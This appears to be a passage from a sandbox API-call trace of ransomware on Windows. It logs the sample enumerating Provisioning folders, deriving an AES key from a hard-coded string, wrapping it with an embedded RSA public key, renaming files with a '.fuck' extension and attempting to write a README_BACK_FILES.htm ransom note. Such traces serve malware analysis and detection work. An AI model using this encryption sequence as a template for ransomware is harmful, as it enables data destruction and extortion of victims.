[0237.617] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\RunTime.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\runtime.xml.fuck")) returned 0 [0237.617] CryptDestroyHash (hHash=0x2846460) returned 1 [0237.617] CryptDestroyKey (hKey=0x2845fe0) returned 1 [0237.617] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.617] FindNextFileA (in: hFindFile=0x2845de0, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0 [0237.617] FindClose (in: hFindFile=0x2845de0 | out: hFindFile=0x2845de0) returned 1 [0237.617] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\readme_back_files.htm")) returned 0xffffffff [0237.618] AreFileApisANSI () returned 1 [0237.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e28c8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 105 [0237.618] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\Prov\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\prov\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ebac, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.618] GetLastError () returned 0x5 [0237.618] GetLastError () returned 0x5 [0237.618] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0 [0237.618] FindClose (in: hFindFile=0x2845ea0 | out: hFindFile=0x2845ea0) returned 1 [0237.618] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\readme_back_files.htm")) returned 0xffffffff [0237.618] AreFileApisANSI () returned 1 [0237.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x2e2ee0, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0237.619] CreateFileW (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\README_BACK_FILES.htm" (normalized: "c:\\programdata\\microsoft\\provisioning\\{b0b9123d-7d7f-4c6b-9973-ceced46f2a09}\\readme_back_files.htm"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x2b9ef48, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.619] GetLastError () returned 0x5 [0237.619] GetLastError () returned 0x5 [0237.619] FindNextFileA (in: hFindFile=0x2816f58, lpFindFileData=0x2b9f160 | out: lpFindFileData=0x2b9f160) returned 1 [0237.619] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\*.*", lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 0x2845ea0 [0237.619] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.619] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.619] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.619] GetLastError () returned 0x5 [0237.619] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml")) returned 0x20 [0237.620] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml", dwFileAttributes=0x80) returned 0 [0237.623] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.623] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.623] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.624] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844b28) returned 1 [0237.626] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.626] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.626] CryptHashData (hHash=0x2845de0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.626] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x2845de0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846460) returned 1 [0237.626] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.626] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.626] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x2845760) returned 1 [0237.627] CryptImportPublicKeyInfo (in: hCryptProv=0x2845760, dwCertEncodingType=0x1, pInfo=0x284f258*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f288*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f290*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x2846220) returned 1 [0237.627] CryptEncrypt (in: hKey=0x2846220, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.627] CryptEncrypt (in: hKey=0x2846220, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2845078*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2845078*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.627] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2845078, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.627] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2857568, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2857568, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.627] CryptEncrypt (in: hKey=0x2846460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2857568*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2857568*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.627] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2857568, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.627] CloseHandle (hObject=0xffffffff) returned 1 [0237.628] CloseHandle (hObject=0xffffffff) returned 1 [0237.628] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml"), bFailIfExists=0) returned 0 [0237.628] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml", dwFileAttributes=0x0) returned 0 [0237.628] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.gsg")) returned 0 [0237.629] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\customizations.xml.fuck")) returned 0 [0237.629] CryptDestroyHash (hHash=0x2845de0) returned 1 [0237.629] CryptDestroyKey (hKey=0x2846460) returned 1 [0237.629] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.629] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.629] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9ecd4 | out: lpSystemTimeAsFileTime=0x2b9ecd4) [0237.629] GetLastError () returned 0x5 [0237.629] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml")) returned 0x20 [0237.631] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml", dwFileAttributes=0x80) returned 0 [0237.632] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.632] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.632] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml.gsg", dwFileAttributes=0x2) returned 0 [0237.632] CryptAcquireContextA (in: phProv=0x2b9dcd0, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9dcd0*=0x2844b28) returned 1 [0237.635] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9dcd4 | out: phHash=0x2b9dcd4) returned 1 [0237.635] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.635] CryptHashData (hHash=0x28463e0, pbData=0x2ecb20, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.635] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x28463e0, dwFlags=0x1000000, phKey=0x2b9dcc0 | out: phKey=0x2b9dcc0*=0x2846460) returned 1 [0237.635] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9dcdc, pcbBinary=0x2b9dcbc, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.635] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9dcdc, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8 | out: pvStructInfo=0x2b9dcb0, pcbStructInfo=0x2b9dcb8) returned 1 [0237.635] CryptAcquireContextA (in: phProv=0x2b9dccc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9dccc*=0x28457e8) returned 1 [0237.636] CryptImportPublicKeyInfo (in: hCryptProv=0x28457e8, dwCertEncodingType=0x1, pInfo=0x284f8d8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f908*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f910*, PublicKey.cUnusedBits=0x0), phKey=0x2b9dcc4 | out: phKey=0x2b9dcc4*=0x28460e0) returned 1 [0237.636] CryptEncrypt (in: hKey=0x28460e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9dcb4*=0x80) returned 1 [0237.636] CryptEncrypt (in: hKey=0x28460e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2845870*, pdwDataLen=0x2b9dcc8*=0x18, dwBufLen=0x80 | out: pbData=0x2845870*, pdwDataLen=0x2b9dcc8*=0x80) returned 1 [0237.637] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2845870, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.637] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2857568, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9dcd8, lpOverlapped=0x0 | out: lpBuffer=0x2857568, lpNumberOfBytesRead=0x2b9dcd8*=0x0, lpOverlapped=0x0) returned 0 [0237.637] CryptEncrypt (in: hKey=0x2846460, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2857568*, pdwDataLen=0x2b9dcd8*=0x0, dwBufLen=0x400 | out: pbData=0x2857568*, pdwDataLen=0x2b9dcd8*=0x10) returned 1 [0237.637] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2857568, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9dcd8, lpOverlapped=0x0) returned 0 [0237.637] CloseHandle (hObject=0xffffffff) returned 1 [0237.637] CloseHandle (hObject=0xffffffff) returned 1 [0237.637] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml"), bFailIfExists=0) returned 0 [0237.637] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml", dwFileAttributes=0x0) returned 0 [0237.638] DeleteFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.gsg")) returned 0 [0237.638] MoveFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\MasterDatastore.xml.fuck" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\masterdatastore.xml.fuck")) returned 0 [0237.638] CryptDestroyHash (hHash=0x28463e0) returned 1 [0237.638] CryptDestroyKey (hKey=0x2846460) returned 1 [0237.638] CryptReleaseContext (hProv=0x2844b28, dwFlags=0x0) returned 1 [0237.638] FindNextFileA (in: hFindFile=0x2845ea0, lpFindFileData=0x2b9edc4 | out: lpFindFileData=0x2b9edc4) returned 1 [0237.638] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\*.*", lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 0x2846460 [0237.639] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.639] FindNextFileA (in: hFindFile=0x2846460, lpFindFileData=0x2b9ea28 | out: lpFindFileData=0x2b9ea28) returned 1 [0237.639] FindFirstFileA (in: lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\*.*", lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 0x28463e0 [0237.640] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.640] FindNextFileA (in: hFindFile=0x28463e0, lpFindFileData=0x2b9e68c | out: lpFindFileData=0x2b9e68c) returned 1 [0237.640] GetSystemTimePreciseAsFileTime (in: lpSystemTimeAsFileTime=0x2b9e59c | out: lpSystemTimeAsFileTime=0x2b9e59c) [0237.640] GetLastError () returned 0x5 [0237.640] GetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml")) returned 0x20 [0237.640] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x80) returned 0 [0237.641] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.641] CreateFileA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml.gsg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0237.641] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml.gsg", dwFileAttributes=0x2) returned 0 [0237.641] CryptAcquireContextA (in: phProv=0x2b9d598, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0x0 | out: phProv=0x2b9d598*=0x2844b28) returned 1 [0237.644] CryptCreateHash (in: hProv=0x2844b28, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x2b9d59c | out: phHash=0x2b9d59c) returned 1 [0237.644] lstrlenA (lpString="TVpGTgobjlbbFWBWIZZuaMfWzMlQm") returned 29 [0237.644] CryptHashData (hHash=0x2845fe0, pbData=0x2ecb70, dwDataLen=0x1d, dwFlags=0x0) returned 1 [0237.644] CryptDeriveKey (in: hProv=0x2844b28, Algid=0x6610, hBaseData=0x2845fe0, dwFlags=0x1000000, phKey=0x2b9d588 | out: phKey=0x2b9d588*=0x2846160) returned 1 [0237.644] CryptStringToBinaryA (in: pszString="-----BEGIN PUBLIC KEY-----MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCn7fL/1qsWkJkUtXKZIJNqYfnVByVhK/LzQecPhVR7r+4ng1nZBxg44SexS63iYlnodqDWkH/Hi82Uc0UmugY/Ow39uEGeoiYqWl5BLM8pfRAGqzxbh600Qd/Oc5kYdg8hP0D/gAHXwutL74fygpB6xb8EZl2BHKvpDR80GYFlrQIDAQAB-----END PUBLIC KEY-----", cchString=0x0, dwFlags=0x0, pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0 | out: pbBinary=0x2b9d5a4, pcbBinary=0x2b9d584, pdwSkip=0x0, pdwFlags=0x0) returned 1 [0237.644] CryptDecodeObjectEx (in: dwCertEncodingType=0x1, lpszStructType=0x8, pbEncoded=0x2b9d5a4, cbEncoded=0xa2, dwFlags=0x8000, pDecodePara=0x0, pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580 | out: pvStructInfo=0x2b9d578, pcbStructInfo=0x2b9d580) returned 1 [0237.644] CryptAcquireContextA (in: phProv=0x2b9d594, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2b9d594*=0x2845210) returned 1 [0237.645] CryptImportPublicKeyInfo (in: hCryptProv=0x2845210, dwCertEncodingType=0x1, pInfo=0x284f3f8*(Algorithm.pszObjId="1.2.840.113549.1.1.1", Algorithm.Parameters.cbData=0x2, Algorithm.Parameters.pbData=0x284f428*, PublicKey.cbData=0x8c, PublicKey.pbData=0x284f430*, PublicKey.cUnusedBits=0x0), phKey=0x2b9d58c | out: phKey=0x2b9d58c*=0x2845d60) returned 1 [0237.645] CryptEncrypt (in: hKey=0x2845d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x2b9d57c*=0x18, dwBufLen=0x18 | out: pbData=0x0*, pdwDataLen=0x2b9d57c*=0x80) returned 1 [0237.645] CryptEncrypt (in: hKey=0x2845d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2844f68*, pdwDataLen=0x2b9d590*=0x18, dwBufLen=0x80 | out: pbData=0x2844f68*, pdwDataLen=0x2b9d590*=0x80) returned 1 [0237.645] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2844f68, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.645] ReadFile (in: hFile=0xffffffff, lpBuffer=0x2857d70, nNumberOfBytesToRead=0x380, lpNumberOfBytesRead=0x2b9d5a0, lpOverlapped=0x0 | out: lpBuffer=0x2857d70, lpNumberOfBytesRead=0x2b9d5a0*=0x0, lpOverlapped=0x0) returned 0 [0237.645] CryptEncrypt (in: hKey=0x2846160, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2857d70*, pdwDataLen=0x2b9d5a0*=0x0, dwBufLen=0x400 | out: pbData=0x2857d70*, pdwDataLen=0x2b9d5a0*=0x10) returned 1 [0237.645] WriteFile (in: hFile=0xffffffff, lpBuffer=0x2857d70, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x2b9d5a0, lpOverlapped=0x0) returned 0 [0237.645] CloseHandle (hObject=0xffffffff) returned 1 [0237.645] CloseHandle (hObject=0xffffffff) returned 1 [0237.645] CopyFileA (lpExistingFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml.gsg" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml.gsg"), lpNewFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml" (normalized: "c:\\programdata\\microsoft\\provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\prov\\runtime\\power_0.provxml"), bFailIfExists=0) returned 0 [0237.646] SetFileAttributesA (lpFileName="C:\\\\ProgramData\\Microsoft\\Provisioning\\{ee4aac98-c174-4941-82b1-d121e493e4fb}\\Prov\\RunTime\\Power_0.provxml", dwFileAttributes=0x0) returned 0 [0237.646] DeleteFileA 